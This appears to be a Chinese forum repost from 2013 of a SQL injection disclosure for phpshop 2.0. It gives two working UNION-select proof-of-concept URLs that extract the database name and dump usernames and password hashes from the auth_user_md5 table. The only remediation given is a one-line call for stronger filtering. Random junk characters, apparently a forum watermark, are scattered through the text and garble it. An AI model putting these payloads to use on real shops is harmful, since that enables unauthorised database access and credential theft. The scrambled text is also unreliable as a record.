标题 : phpshop 2.0 SQL Injection Vulnerability
8 t! I4 a; w+ D+ M4 f3 |1 ~+ c3 E1 C; Q
作者 : By onestree+ a" h: v: K& [
下载地址 : http://code.google.com/p/phpshop/downloads/list
6 B. X' F% X ?6 h8 C+ O测试地址: windows 7 / ubuntu0 t/ N9 ~2 |. T2 X) w: @7 h) P
& Q" t/ V q. N4 B. l% X7 E ) Y4 H4 i8 u, ~4 w
SQLi p0c:! {( B( }* ~: `6 D5 M7 I9 I
D, F7 R) x5 z$ \4 G a/ p==================4 E( r- u1 [2 F' u- J6 @' V/ G
* m& B# I7 N. j0 B2 c( T! r4 v* F1 z
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'# K& m: v+ k! D
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --5 y& ^ Y& \* u: ~8 U+ \
) p( q/ Y$ w4 [: [4 j" Jhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( g3 N) m' B+ {+ H
7 Z& S% V& y$ u3 k8 f3 W
修复:0 F* g; q" W! g. g P' m
加强过滤1 H7 n4 b% K9 T
: @7 K7 k( [2 N) Y) s' F$ J4 t2 T* n8 `
9 c* p0 }, j7 U7 o' t |
发表于 2013-1-18 18:24:10
收藏
支持
反对